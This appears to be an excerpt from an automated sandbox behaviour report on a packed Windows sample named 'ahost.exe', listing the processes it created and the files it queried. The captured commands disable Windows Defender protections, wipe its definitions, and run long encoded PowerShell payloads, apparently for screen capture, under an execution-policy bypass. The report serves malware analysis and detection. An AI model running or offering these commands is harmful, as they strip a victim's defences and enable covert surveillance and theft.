Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe

Code function: 104_2_00007FF7CF8CB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

104_2_00007FF7CF8CB340

Source: C:\Users\user\Desktop\ahost.exe

Code function: 0_2_00007FF7F92095E0 cpuid

0_2_00007FF7F92095E0

Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
